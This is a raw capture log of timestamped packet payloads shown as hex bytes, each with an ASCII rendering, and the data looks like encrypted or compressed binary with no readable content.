                                                                                                                                                2022-09-29 12:51:30 UTC7985INData Raw: ab 0b 2e 2d 4a f5 26 e4 61 cb 85 ac 1a 71 5f e1 7e 8a 01 52 58 21 0c a6 58 56 d4 bd 71 18 fd 36 e7 63 c8 7d 70 78 ae 87 87 c6 44 4e 50 ae ad 2c 13 19 b1 31 5c d1 4a 4a ec 14 c1 e7 32 0b b6 13 70 8c 7f 8b c2 98 fb f9 66 54 55 73 b7 81 e6 ac 9b 45 ee cb 23 68 47 a8 6b 92 f7 a5 1a af fa 01 e1 c2 46 14 d6 6a ab e0 2b ec c5 c6 c6 31 ae bc fd c8 6d de a2 d1 1f 3d 46 04 29 d6 7a 76 ed 53 5d 30 2b 86 8c 77 94 4e 1f 3c 07 52 21 1c 11 95 ec 9e 02 99 e1 a7 5d 90 4f 2c 9e f5 b2 13 68 ef c8 7d 8c 36 d0 1c ef d6 34 66 58 9a a6 54 bf 70 e4 f9 77 2d ec a8 fb 0b 0e fb af e3 57 70 06 75 c9 58 af 70 56 0a 95 f9 59 26 7b 87 bc ba af 08 cf 32 1b c8 20 a1 71 ac f0 50 c1 3e 11 21 06 72 5b c9 8d fa 47 e8 56 7a 34 b1 6c e0 47 1a 5f 93 83 d7 6a 55 d9 1b 39 76 a9 c1 23 00 97 f9 cb
                                                                                                                                                Data Ascii: .-J&aq_~RX!XVq6c}pxDNP,1\JJ2pfTUsE#hGkFj+1m=F)zvS]0+wN<R!]O,h}64fXTpw-WpuXpVY&{2 qP>!r[GVz4lG_jU9v#
                                                                                                                                                2022-09-29 12:51:30 UTC8001INData Raw: 6e 6e 56 ed fd 3f 1e 22 19 56 40 32 63 88 74 d3 b6 c2 1a 58 fc 2e 92 71 1d 96 cb 25 d1 73 c3 be f4 8e 68 95 a6 79 1a 56 3c 89 c3 50 7d 21 ca 75 84 4f d1 f9 d0 11 6b 4b 6c 3f 5d 8c ef 1b 48 97 42 20 9d 9e 4f 5c 48 67 5f 46 f7 66 b5 18 60 9a 3f 0f 74 b7 43 03 17 a8 31 da e1 29 86 6b b4 e1 ef 85 08 af 0c f3 e3 d5 d1 04 53 ac 5b 35 e1 ff 45 c5 99 0a 78 5d 50 29 26 fd 44 ad a7 09 b2 ec d0 98 1e 54 79 e8 e5 41 d3 65 8a 4f d9 37 18 a2 df 0a ce 7f a9 36 9a da b7 f4 3f ae f2 ef 6f 3c a6 e8 fa f7 91 08 2e cd 6b ef fd b6 0d 2b 25 8c 5b 75 ee 53 58 e3 90 fd 2f 29 d7 5e d2 97 a0 c6 0e 59 7a 1c 82 3b e5 a5 74 cf da 72 d5 db 58 05 27 51 64 e6 3d 0b cd 05 22 4b f8 20 70 12 94 4c 54 c8 ad 58 85 60 31 70 03 a6 85 e4 99 22 9b c0 0b 21 5a 31 17 f1 87 c1 f6 9c 2b 41 16 64 6c
                                                                                                                                                Data Ascii: nnV?"V@2ctX.q%shyV<P}!uOkKl?]HB O\Hg_Ff`?tC1)kS[5Ex]P)&DTyAeO76?o<.k+%[uSX/)^Yz;trX'Qd="K pLTX`1p"!Z1+Adl
                                                                                                                                                2022-09-29 12:51:30 UTC8017INData Raw: 89 f4 a3 8b d3 1a f6 2f 36 74 ba 47 6e aa c6 fd 92 f3 f2 6e f9 c9 48 d8 d7 55 ca ef 34 3b e0 ed 5d 7b 02 98 fc 14 80 32 16 73 06 50 d8 4d 31 65 e9 64 36 26 43 61 2b c5 8f 47 ab de 4d 29 cc b7 1b ae 57 71 be fa ce eb ec 52 31 1f eb 83 61 73 57 11 65 9f 45 69 02 dd fd 83 05 e1 d4 c9 63 bb e5 f9 5a 6b 61 e6 d4 7f 3d 90 c7 cd 69 fb b6 3b 04 65 ef 08 58 04 4b 1d ca 1d 5c 1c 79 33 c4 2b de 45 1d 05 39 a6 55 bd 6a 8b 3b 42 81 ed a9 64 43 d1 6d ba 0e 37 a6 c1 d2 92 fd 40 e6 33 fa 8d 74 b4 ed 9c fd 83 97 49 b1 c0 ed b4 d0 5d be 36 9c 6e 76 68 5b 2f c7 02 19 70 bb c0 30 e8 6d 0e 63 7b fa e0 dc 1a fc e8 44 33 9b b7 20 ab e5 11 af d7 2d 3f ba 4e 90 5c b4 04 28 3d e2 1d be 9e 02 74 d6 14 c1 6e 93 cb 8e 1f 6b 3a b2 a3 d5 bc 8a aa 8b 25 c7 95 b5 d3 3d bb d6 cb d3 cf c1
                                                                                                                                                Data Ascii: /6tGnnHU4;]{2sPM1ed6&Ca+GM)WqR1asWeEicZka=i;eXK\y3+E9Uj;BdCm7@3tI]6nvh[/p0mc{D3 -?N\(=tnk:%=
                                                                                                                                                2022-09-29 12:51:30 UTC8033INData Raw: 1d ca ae 88 65 5d 78 40 55 b0 fd 2e af fa 89 bf 0d 18 6c 9c d8 49 01 0e 2c 9f a2 98 d1 26 e2 33 2a ec a5 f6 85 d3 d7 02 3a aa 08 8b d3 05 2a c0 85 62 82 2b 79 3e f7 80 00 bd f8 8b 94 b7 9c 2c d2 b2 c8 7f 1e ab d9 70 8f bc 5d da 70 82 14 27 e0 e1 83 d5 f5 a5 c0 60 0c d0 bb e2 a6 54 75 d4 01 3a 16 0c 2f f0 55 86 5f 20 b0 d5 53 ef 58 1e 22 e4 35 89 57 ec 21 de 3d 05 82 28 f4 84 92 07 96 9e 8c 10 f9 34 fa 6b ac 05 98 5a cb c1 ac 12 61 a9 b9 03 55 ed 9a 44 fe f2 4f 79 74 73 73 c0 ab a1 6c 25 1c c5 f1 c8 1a f6 ff 65 56 d8 e5 f6 ed 1f cb d8 f2 1b 6b 7b 28 43 d3 89 59 c3 89 ff c1 53 fe 5c 6a 84 2c de ce b8 c0 45 78 36 71 6c b9 35 90 6c fd eb a7 bb a6 e7 8b 14 4f 74 a7 17 e0 5e bd 40 e4 c9 19 82 c6 25 7a 86 10 a7 e9 94 e7 9d 3a 51 64 cd 8b 22 8a ca 81 21 bb ac 16
                                                                                                                                                Data Ascii: e]x@U.lI,&3*:*b+y>,p]p'`Tu:/U_ SX"5W!=(4kZaUDOytssl%eVk{(CYS\j,Ex6ql5lOt^@%z:Qd"!
                                                                                                                                                2022-09-29 12:51:30 UTC8049INData Raw: b8 c6 61 02 28 6b b1 25 7f d5 5e ab a0 14 93 02 b1 31 74 28 83 85 da 1b b3 72 0b 28 29 a7 cb 63 d6 6f c4 6b ae 0f 0e f4 f8 f3 34 60 66 22 66 43 6d 86 da e5 39 22 12 ec 95 5e e8 e8 90 03 ef 2e 13 99 74 94 d4 01 a5 d4 09 66 0c 83 54 e5 31 04 cb 81 c1 5c 20 9c 22 04 4a 55 e6 21 33 79 3e 70 25 19 df 70 65 00 f5 82 bb a2 6a 78 5e ec 2b 8c ec d9 88 98 b2 ff 22 90 09 e2 5c 20 b3 f1 e8 39 ec af 22 4d 26 46 e0 5b 2a 3d 45 cd f1 bf fc 08 a8 15 9f d3 66 33 d0 b3 39 96 96 b8 0c 06 3d cd 53 49 ff 17 02 4b 46 35 e2 91 c3 c6 d5 eb 28 d3 8e 31 a6 30 13 0a df 17 18 64 60 d4 46 e9 88 27 f7 71 c7 53 cb c8 5a 52 87 7c eb b9 be 09 6b e4 6c b6 f4 5f 12 2b a4 c9 6d 3b 79 01 9d 55 1d 46 23 70 ed a0 cd e6 3b f1 1a aa 01 ef 42 10 77 b1 26 42 91 8b d4 7f bb fc 24 04 9f 58 b2 c9 2f
                                                                                                                                                Data Ascii: a(k%^1t(r()cok4`f"fCm9"^.tfT1\ "JU!3y>p%pejx^+"\ 9"M&F[*=Ef39=SIKF5(10d`F'qSZR|kl_+m;yUF#p;Bw&B$X/
                                                                                                                                                2022-09-29 12:51:30 UTC8065INData Raw: df 38 1c 7b 3b 2e 1e 75 82 80 c6 6b 66 e8 b5 6a 8d 11 ce 4a e6 09 c8 65 65 b8 49 d5 35 30 ca 8c e8 0b ff 82 f9 de 0e 17 13 ee 16 08 be 40 f2 eb 23 fc fd 9a c9 4d 37 61 88 d3 e9 75 b6 17 90 76 76 a3 c6 9c 4e 26 b3 31 6d e0 b3 17 85 12 42 e6 72 a7 c5 1d 4d 9f e5 24 8c d5 2f fd af c2 12 94 5d 60 8f b2 82 0e 20 18 1e d0 c2 95 4a 58 6a c9 c1 4b 2c f3 1b 0b c6 7a d8 84 8a d1 23 4e d9 8b 2d 4b 37 d3 bc ff 0a 10 bd 39 9e 29 0a 80 a4 2f 50 89 65 81 71 0c d3 3e e9 df 16 07 ed 54 f0 5b 71 e5 dd 6b f4 02 75 b6 92 60 ba c6 ff 9a b5 a9 9a 8a ab 0c 2e e7 a7 1d 40 73 18 99 65 3c 75 94 f6 cf 40 0a 32 6b 13 ca f1 73 59 0d cb a5 6c 1c 83 ad 6c 6f e5 b4 a4 fa e5 7a 4d f1 98 e8 94 cd 17 70 5a 33 bb 30 66 86 37 30 13 44 3c 70 ee 28 cf f8 26 8d 69 9c 30 b7 16 93 69 1f 99 34 1b
                                                                                                                                                Data Ascii: 8{;.ukfjJeeI50@#M7auvvN&1mBrM$/]` JXjK,z#N-K79)/Peq>T[qku`.@se<u@2ksYllozMpZ30f70D<p(&i0i4
                                                                                                                                                2022-09-29 12:51:30 UTC8081INData Raw: 9c 76 96 0b 81 5f 46 47 4e 27 3f f4 f3 17 33 77 d8 ec 34 a8 d8 3d 3a 2b 29 34 0c e5 8d 3b 28 28 4a 07 e3 83 2a cd 36 84 89 ba 49 69 a3 04 30 1d 25 41 c0 37 8a f1 6a 07 c0 25 ce ff b3 1c 62 cc f3 cf ec 55 a1 fb 3c be 4e 34 e5 5c 2f 20 67 72 33 f6 e4 ce 7f 4e e3 92 27 9c bb 33 3a 2b 69 49 e6 3f f2 d4 80 09 c6 bc 75 23 ac be 28 4e 05 14 89 71 8f ff fb 6a 4e b6 be aa 66 20 5d 15 a9 9e cf cc f9 80 70 e7 53 20 7d 30 b6 d5 01 d6 99 fe c2 42 d1 1f 71 8e 73 ad 53 43 71 9c 8b c9 ea 02 d0 6e 35 74 f8 ca 75 21 02 8f ed 7f 32 04 d8 d2 6b 06 3c 58 f7 c5 28 3b aa 56 e4 1e 9e 5e 8b 49 a8 2c 84 81 21 11 35 e6 cc 1f 80 f2 ae ff 82 11 f8 ce d5 3b 24 cf d1 05 3c 05 97 bc 9e a7 6e 78 b7 75 7c 05 65 63 55 af 39 d7 0b fc 14 f3 49 a4 fd 39 aa 43 00 e4 c1 d2 80 18 eb 3b 2f 22 60
                                                                                                                                                Data Ascii: v_FGN'?3w4=:+)4;((J*6Ii0%A7j%bU<N4\/ gr3N'3:+iI?u#(NqjNf ]pS }0BqsSCqn5tu!2k<X(;V^I,!5;$<nxu|ecU9I9C;/"`
                                                                                                                                                2022-09-29 12:51:30 UTC8097INData Raw: 05 e8 79 46 ee 3d f2 dd a6 9f 6f c9 e5 f9 8e d7 aa e8 70 83 04 86 4f 5f f8 04 64 38 e2 ef 56 d0 4e a7 a2 df 47 13 5e cb c4 29 e9 32 5d 4b 0b c9 ac ec 5b 87 29 7f fe 75 ee 22 f9 ca 74 f3 82 76 48 8e f4 4e 3e 18 49 e9 99 2d 2a 45 74 bd 36 4f 26 16 0e 0f 6a 7e 03 e2 0d 42 81 e4 de 8c b9 df ce ed 43 2a 40 87 7c 02 49 a5 8a 4a 60 30 dc 4d 7f ca 2a b3 3a c4 ed 52 f7 d0 74 a5 dd 28 00 a0 95 eb 79 01 e3 fc da af 6c 62 b9 c9 a9 40 8e 48 0f 69 15 d3 e4 16 6d 20 6f d4 dc d5 aa ee c7 67 f6 0a ba 67 c4 ec b2 0e 27 e6 79 85 09 c7 ee a4 a8 3e 59 c5 2f 4e c7 54 9e 8c e0 d3 6d 5c 92 c3 ad b6 27 02 8d fb 8a 29 c6 32 ff 26 d3 69 15 5a 53 e0 8e 8f ba b3 8b 4c 0c 0f 85 2e a3 7d 19 51 20 ea 24 1a f9 03 2b 46 69 2a 87 92 32 96 16 7a a0 48 3f e9 e2 02 9c 64 c0 93 87 57 59 f4 88
                                                                                                                                                Data Ascii: yF=opO_d8VNG^)2]K[)u"tvHN>I-*Et6O&j~BC*@|IJ`0M*:Rt(ylb@Him ogg'y>Y/NTm\')2&iZSL.}Q $+Fi*2zH?dWY
                                                                                                                                                2022-09-29 12:51:30 UTC8113INData Raw: c6 6c a6 87 00 bc ed 04 74 20 50 67 4c 02 34 47 1f 6e af 9b 94 00 2d f5 0d 39 e7 4a ec d9 05 a5 cb 91 23 68 31 5e 24 73 46 0a af 2a 84 57 3f 44 13 ec bc bf cd 09 1f 76 74 41 ba 4d 03 71 fd 44 d8 20 c6 d0 aa 24 0e 17 aa 13 a8 87 b3 34 f9 8e fc 59 68 52 44 76 dd 03 a4 5f d8 9a 82 19 25 63 66 95 70 e7 3b 28 dc ae 54 d4 b4 55 c4 70 c0 a6 44 85 87 e4 b0 db 11 ac 9d d1 a0 c8 dd ce 67 71 a8 ff ca 6c d9 cf 85 22 d0 7d 01 60 42 97 30 c2 60 43 f8 70 32 d6 a8 1e b4 2a 1b 74 9c 17 98 3f 03 95 bc a7 f3 05 ca f8 e0 92 1a 79 9b 69 b5 57 e8 0a 87 ce 63 0a d6 8c 7f de ad ff 63 b5 55 23 c0 04 aa 11 6f 74 ac 24 04 04 eb 4c da d4 42 e7 38 88 50 ce 7a 9f 07 22 7d 18 91 2c ba 23 f4 e4 ad 9f 59 2b 89 56 59 52 4a 0c 19 e1 df 8e c1 50 bc 75 dc 6a 93 5f 6b 75 32 f1 fc 7d 90 43 46
                                                                                                                                                Data Ascii: lt PgL4Gn-9J#h1^$sF*W?DvtAMqD $4YhRDv_%cfp;(TUpDgql"}`B0`Cp2*t?yiWccU#ot$LB8Pz"},#Y+VYRJPuj_ku2}CF
                                                                                                                                                2022-09-29 12:51:30 UTC8129INData Raw: d0 0b b7 46 8b a2 79 f3 69 f6 a3 72 fd 1c 78 d6 3b cb 23 67 41 12 a5 03 8b 2d 11 03 77 1e 7b 51 45 0a 2c 6f 7c 5d 3f c5 f7 e0 77 69 80 5a 19 64 37 91 42 73 be e6 42 bf 5d 85 22 9e d4 50 d2 b8 43 bc db 04 d8 c1 09 84 47 ae 95 93 71 cb 45 55 d0 80 29 58 62 10 26 5d d3 3d 1c 8a 21 dc 0f 8a c4 6f 58 9d eb 0f ab 9a d2 76 12 18 7a 1f 2a fb 98 2d 6d 93 6c cb b6 d6 41 9c 9e 56 24 9e 71 7d 3e 7f 2f 61 24 47 1b be 4c 02 24 d1 c1 21 c3 87 b5 d6 85 ab 04 f9 85 5c 15 f9 8f b6 40 e9 ac 81 f6 5e 51 98 b4 da f7 3d 1f 0d f3 b2 e8 91 7f 39 89 98 64 b8 ea 82 31 d8 3d 67 f8 06 e7 11 8b ca 77 3c b8 0c b4 0e 3a d4 fa 3b 1b 47 5c a5 98 6e f6 35 e5 8b 05 90 bb 9a d1 5d 4f 6b 45 29 4a 94 4a 45 cf f7 09 ba b9 e6 02 6e e1 50 ee e9 ee aa 60 ac 53 47 d7 6d e1 3c b2 83 06 8b cc 6f 1a
                                                                                                                                                Data Ascii: Fyirx;#gA-w{QE,o|]?wiZd7BsB]"PCGqEU)Xb&]=!oXvz*-mlAV$q}>/a$GL$!\@^Q=9d1=gw<:;G\n5]OkE)JJEnP`SGm<o
                                                                                                                                                2022-09-29 12:51:30 UTC8145INData Raw: d7 d4 2e ba af a2 2c 99 d4 6e e5 00 9d 3f a5 1a dd 1a c5 9b 5c 96 d1 ee d5 ea 0a 5c 29 2f 66 0b a5 d8 cc 5f 8b 24 d9 6f 12 67 00 48 a8 cf a9 da 69 2c ed 08 56 51 7a e0 99 c6 93 0e 61 b2 aa e5 79 a2 13 11 4e d8 59 99 34 c5 df 59 90 b6 66 d3 7e 17 38 45 2b e3 ca 4c a3 d7 a9 53 41 82 3b e1 c4 d0 0c a3 9c 11 a5 f6 0c 26 a9 83 f1 88 12 9f 9a f4 97 97 70 c1 50 da 15 56 7a fd 6c 87 1a b7 92 ea 36 32 00 18 52 94 a7 69 44 8b d8 2c c0 34 bc 30 27 68 1e 87 f2 6d 06 b0 1e 85 53 df 29 c3 ef 70 f5 b9 26 f6 25 85 f6 c3 45 1f 64 d4 55 04 7f 99 10 26 3e 71 f1 90 2d 10 72 98 73 9f 7d f2 b5 84 42 37 a5 d4 d5 ee 28 b6 d6 5d ca 11 fd 97 02 fd a5 5b 5c 60 4f 89 87 32 3f d0 46 d1 76 0e 84 88 1f 94 c1 35 a0 d7 8f d0 5c 3a 5d b2 e4 4f ce a6 85 3f 60 6b 82 74 44 f8 17 79 d6 43 da
                                                                                                                                                Data Ascii: .,n?\\)/f_$ogHi,VQzayNY4Yf~8E+LSA;&pPVzl62RiD,40'hmS)p&%EdU&>q-rs}B7(][\`O2?Fv5\:]O?`ktDyC
                                                                                                                                                2022-09-29 12:51:30 UTC8161INData Raw: 0b d3 7f 00 b0 c4 ad 18 df 70 49 6f 65 d9 b4 b8 c1 0e a0 69 5f 7f 7f 8c b2 8c 0c a5 8c 13 cd 06 8e 3b 46 ba a0 5e ce ad 0b dc e9 15 70 94 ea 51 32 9e 5e 1f 4e 66 f6 5b f0 97 3b 24 03 b5 53 ce 69 e3 4d 91 15 f5 98 c3 2f 50 46 3a 0f d6 a7 63 63 cc a3 4d 0c 14 d6 5c eb 31 28 e0 98 8f 36 26 81 4e 37 81 64 27 40 1d f7 6c e9 8d 60 76 a6 7a 3b bf d1 1b 57 fc ac dc 13 a3 33 75 3b 95 c8 5c 2a 9f c3 83 48 80 16 cd e8 a4 d3 73 f5 9e 2e 73 8e e1 db 6c 98 6e 04 c0 3c 37 5d 75 ac 2f 03 0c 45 70 78 f7 21 56 c8 18 cf 55 d4 89 f0 48 96 d2 6f 13 f1 bf e5 85 7b e2 69 aa ab 6a 8b ba 20 7c 22 4b 51 70 4a db 88 36 ec 96 a9 82 87 9b 68 52 c1 4c cf 5e 81 46 8b 9d bb 3c 1f 82 80 9e da bc fb 54 41 ee 3d 23 f2 19 7c 02 0b d6 43 37 dc f3 76 a9 5e 72 e0 8e ec 39 3a ab 55 f0 f7 37 cf
                                                                                                                                                Data Ascii: pIoei_;F^pQ2^Nf[;$SiM/PF:ccM\1(6&N7d'@l`vz;W3u;\*Hs.sln<7]u/Epx!VUHo{ij |"KQpJ6hRL^F<TA=#|C7v^r9:U7
                                                                                                                                                2022-09-29 12:51:30 UTC8172INData Raw: 0a 67 5d dd e9 d6 85 fe 13 4e 2c 7d d5 95 8a b0 eb cb 90 5c 62 2f ae 26 29 9a 6d 5b 9d 94 ca ba 44 ce 91 c1 8a 3b 3e bc ae bd 78 54 88 d9 12 85 f4 6a aa 60 37 e6 45 8b 6e cb 8a 80 8b e8 8b 13 45 11 73 1e 4b c1 73 2b 79 4f 4b 32 66 75 f1 be dd c2 4a fd 4d 3b 06 c9 77 e1 c2 33 27 c6 96 bc 88 0c f6 78 eb de 1e 83 e3 88 a7 87 75 f0 58 8d bd 0b 84 dc f0 32 aa 0e c1 9c 65 56 98 7a 5f 7a e9 db 20 a0 b8 b3 78 2d 48 82 3f d8 06 d7 37 9a 4d 40 de 6a c2 c1 da 49 a4 59 9f 2c 1a 18 3a f3 f8 3b 20 c6 ec aa bd 59 d8 9e ae a5 80 9b 12 5b af 5f 5b 63 49 2e 8f 1e f6 5d f2 f0 1d b3 12 dd 82 c9 22 bc bc 65 51 c3 89 71 33 8c 11 ce 01 3e 03 2e b7 43 d7 b9 a7 92 41 89 6d 14 3f d3 b4 dc 87 7a e7 56 83 f7 48 83 02 57 0f 09 9d 89 60 67 8c 07 e9 bd 63 1e 1d 2e 86 74 e7 a8 95 f2 2b
                                                                                                                                                Data Ascii: g]N,}\b/&)m[D;>xTj`7EnEsKs+yOK2fuJM;w3'xuX2eVz_z x-H?7M@jIY,:; Y[_[cI.]"eQq3>.CAm?zVHW`gc.t+
                                                                                                                                                2022-09-29 12:51:30 UTC8188INData Raw: 39 b0 71 62 3e c2 ec 89 33 b2 00 1b 8a e1 ae f3 12 b2 f8 aa 6a 14 4e 2d f4 dc 54 df 57 c5 ea 3e dc 0d df 57 05 6d 14 00 82 4e 9e 8e d9 28 85 ef c0 74 80 9e 48 de ee 15 21 08 b4 6a 2e de 97 5a 96 36 f7 14 c4 cd 9e 02 88 60 44 62 27 8d 30 ee 0f d1 22 b9 da 27 00 bd 10 3f 65 d1 18 f1 41 39 e0 35 45 c6 ac ab bc 75 1c 1c 42 1f ef f3 42 24 38 01 62 b6 a0 26 42 26 b7 bf 89 e1 fb 46 b9 98 f2 f5 83 c0 a3 f5 ee 87 16 c6 fd 5c f4 7d cc 45 65 8d 25 e5 d7 0c a4 90 0b 6f da 1d 83 a3 38 4d a3 91 79 35 01 98 0f ba ca 4b 64 99 bd bb 32 06 c3 4a cc 65 95 1b 4c cf c2 3b 15 ac d4 5c c9 3c f5 43 af e7 16 3c 5e 49 c2 fc d1 ac c4 0e af 3c 5e 6b 60 25 2c 8f 29 5d ad c6 d3 c7 1a 7e 20 32 df 2b d2 cc 36 38 71 98 81 4a 7a 5e 41 89 ee 67 4f aa 9a 92 03 3d 36 37 1d 68 18 4b 4c 0e e9
                                                                                                                                                Data Ascii: 9qb>3jN-TW>WmN(tH!j.Z6`Db'0"'?eA95EuBB$8b&B&F\}Ee%o8My5Kd2JeL;\<C<^I<^k`%,)]~ 2+68qJz^AgO=67hKL
                                                                                                                                                2022-09-29 12:51:30 UTC8204INData Raw: af c0 fe 17 bf e2 bf 6f a0 c5 f3 b2 8e 6f 2c c5 09 2e 14 4d f1 0e 56 44 b1 f4 9c 82 ce 75 93 32 0d d6 57 18 ac 36 d9 63 0e aa 7e 04 ad 57 1c d0 58 36 1e 91 99 84 5a 52 ad 9e 5d 64 a3 82 a5 ad 64 32 c6 23 2b f9 a8 7a 95 65 ab aa d6 50 5f a2 c6 9c a3 b8 8e 5e 10 42 a3 c7 8e e3 ab 53 a4 fa 96 da cd 69 8f 1c 54 27 d5 a8 c7 35 95 92 9d b1 2b 26 50 d9 10 4c 92 47 ed fc 7c 5c fb 5e 54 e5 73 9f 3a 93 44 b4 67 9f 6e 86 97 70 98 88 5f fc e9 b1 12 ad 4c d6 4b 94 50 fc 82 6e a0 c0 78 73 61 4d a2 f7 48 e2 c2 a6 17 9f d2 6d 60 f3 08 bd 28 ce bf 2d c2 cd 22 e7 b9 98 59 f2 29 19 cc 69 d2 b9 33 e7 4b 16 ff 03 30 d3 65 ed a4 4f 0a c4 9a 34 fa df 20 b3 be 1d 4c 89 b0 57 c3 34 48 cc 53 4d fe f9 e6 a5 fb 07 d8 f0 6b 10 3e 13 56 b4 36 50 71 34 ab c7 72 0d db 64 7c 77 a5 35 be
                                                                                                                                                Data Ascii: oo,.MVDu2W6c~WX6ZR]dd2#+zeP_^BSiT'5+&PLG|\^Ts:Dgnp_LKPnxsaMHm`(-"Y)i3K0eO4 LW4HSMk>V6Pq4rd|w5
                                                                                                                                                2022-09-29 12:51:30 UTC8220INData Raw: f0 67 57 87 20 71 e5 a9 56 be 54 19 86 f8 f4 6e fc 08 6b 83 15 78 10 b4 b6 1b 49 f2 6c 79 65 f7 40 5c b4 12 af 41 b8 aa ae e3 63 46 7b b9 da 5b f0 eb 3b 56 96 bf 83 d6 05 69 1a f8 fd 74 5c 78 a3 2d 9d b5 9a 35 91 39 56 d8 f3 0c 4c 4b 5d 57 37 8e c1 a5 3d cc 94 3b 76 af ba 26 46 cc 3c fb d1 44 a1 8f 24 cb a5 2b ba ac dc 5a ae 31 85 62 da cd 25 6d 00 da 34 7d 17 aa 97 a3 45 8f 76 f1 98 f8 0e 69 a4 30 1c ea 1d 05 be 23 3b d2 19 69 7a 75 01 b4 61 98 4e 54 ea 41 a4 13 72 3d 85 f9 fc 10 c6 10 f3 5f 1d 1c 1b 2e 30 27 3c 8d db 53 85 b2 aa 73 72 e0 60 4e 26 34 79 81 62 34 ff e9 ef c4 3e 1c b8 80 02 5e 68 47 00 b1 98 46 c7 3a c7 e1 ce df b6 d0 3c 0f cc 16 34 fd dc 25 58 06 ea 5b 24 4b 99 f7 64 41 e3 7d 9e 7c ed 92 c1 d5 d3 37 e5 b5 a6 80 66 e9 49 73 d7 94 f9 93 fa
                                                                                                                                                Data Ascii: gW qVTnkxIlye@\AcF{[;Vit\x-59VLK]W7=;v&F<D$+Z1b%m4}Evi0#;izuaNTAr=_.0'<Ssr`N&4yb4>^hGF:<4%X[$KdA}|7fIs
                                                                                                                                                2022-09-29 12:51:30 UTC8236INData Raw: 10 b2 96 21 fe d2 cd 33 06 69 53 2d 7c 0c 16 be e4 dd 6f 62 f6 10 4b 87 d0 c7 00 19 71 9d e4 4f 76 c6 e1 54 68 92 53 dd b0 41 d8 b3 0a c9 1a c1 0c ef c8 c8 40 eb 05 0a 1d 47 9f 6f a6 51 00 f3 62 ff 85 ff 9f 1c a3 9b 9f 7e 77 dd 5d c1 09 41 50 df d0 78 f8 b1 82 96 e8 cd 13 df 12 c4 f8 5b 28 1d 83 d3 a0 03 60 29 45 15 44 29 0e 6f 5f d8 f1 ac aa 3b 85 24 b9 de 25 4c 0f 5c a4 cc ec 3f bd 3f 15 c5 58 34 d2 98 aa b4 91 19 9d 1a 3b 5a 88 bc bb 9d c2 30 95 ce 12 17 e5 ae a5 78 e1 39 47 5e b2 1e 6f 37 3e 03 54 54 17 44 d9 d8 64 11 27 c6 6b 08 56 12 d7 e5 5a e0 97 20 6d 83 13 24 7b 29 3a 1d 9c 79 cc a3 63 c6 33 f5 91 b2 eb 00 f3 d4 91 f1 d3 c2 12 73 73 93 ad 6c ea 02 2c 06 13 de dc 3c 82 90 0d 29 b3 51 e1 d7 ca 87 26 85 35 43 04 84 c0 73 e7 02 14 31 da c7 39 24 0a
                                                                                                                                                Data Ascii: !3iS-|obKqOvThSA@GoQb~w]APx[(`)ED)o_;$%L\??X4;Z0x9G^o7>TTDd'kVZ m${):yc3ssl,<)Q&5Cs19$
                                                                                                                                                2022-09-29 12:51:30 UTC8252INData Raw: 2e 2a b8 2e 8c 39 c4 bd 6c 70 e3 ee 86 88 1c 41 d2 69 ea bb 59 85 57 ea 0a d2 e3 2b e7 ef 06 21 fc a1 3a 7e 5c 1d fd aa a6 08 4c 0b 0c 60 c2 38 fe 43 33 54 a2 46 93 2e d0 19 13 eb bd a6 c0 57 d3 fe 93 58 76 49 c2 74 ee 0d 35 9e 0b 5d cb 54 f0 cb 13 8c 8e 33 91 6a f3 fb 00 f6 a6 5c a8 f1 09 8b ad b4 3f 8b 87 7a 21 ca 7e 1c d2 61 56 ac 8a d7 1c b8 8d 00 f3 8e 32 f2 a9 6f c6 dc 08 07 db 94 c7 d2 52 16 70 2d 9f 4f 3e e6 e9 f0 0a 23 f6 14 b3 db 1c 80 a2 f1 ce 94 e4 e2 b5 bd ba 0a c2 ee 7b a7 02 5f 29 67 75 d9 9c 97 6f d7 60 b9 7c d3 46 f2 c7 53 33 01 4d b8 15 27 29 35 ec ed b8 14 63 36 8d 15 84 82 5c da 9a d1 2b 44 b9 d2 21 39 28 69 0c 2e 54 fb 13 d7 b3 bb 5a e7 a1 79 b0 50 ed 76 a9 a2 2c 1a ff 05 cc 75 b5 c1 b1 58 e0 23 e0 24 19 bd 88 7c 48 e4 d8 5d 28 c4 d4
                                                                                                                                                Data Ascii: .*.9lpAiYW+!:~\L`8C3TF.WXvIt5]T3j\?z!~aV2oRp-O>#{_)guo`|FS3M')5c6\+D!9(i.TZyPv,uX#$|H](
                                                                                                                                                2022-09-29 12:51:30 UTC8268INData Raw: c3 6e 4f 9c 4b d8 63 a2 ff 76 99 82 1b 2c f8 7b 74 43 9d b2 8a 31 c5 f9 47 99 05 fb 49 74 9a 06 4d f5 bc 77 16 02 90 51 2f 39 ef 45 68 96 11 b7 55 c2 41 78 75 29 b1 e3 d9 06 73 c5 25 a7 b2 f6 b3 71 1c 69 56 e8 95 cc 37 5a dc b3 1d fb 48 8b e9 05 98 d7 e8 71 57 05 85 77 3d 17 9f aa 44 a8 a9 eb 28 62 ac e8 49 85 97 f5 cc d0 56 c9 6d d0 e8 21 d0 6f 24 b5 f9 f9 a9 4a 71 35 87 73 0a 58 54 ea 4c 6a fe a8 cd d4 19 23 69 4b 27 4b 21 3b ca 2f d7 4d b4 bf 38 e4 21 12 96 3d 58 83 3e a1 ce 17 2f 5e 43 dd ee aa bf 6f 8c b2 ae 02 a8 37 ec e9 81 ef 5b bf a0 93 0b 81 50 5b 62 16 5f f9 b6 f6 ec 5b 3f df 00 19 1d 6c b9 a0 c2 fa 79 b3 1f 58 a5 11 cc 0a 19 e1 51 a4 1c 12 6b 10 30 a4 a6 dd 30 0e ea 58 46 b5 4d a9 ab 35 2b 21 e3 ca e5 1d b2 52 12 1d 69 0a 09 07 8c cb ef ae a9
                                                                                                                                                Data Ascii: nOKcv,{tC1GItMwQ/9EhUAxu)s%qiV7ZHqWw=D(bIVm!o$Jq5sXTLj#iK'K!;/M8!=X>/^Co7[P[b_[?lyXQk00XFM5+!Ri
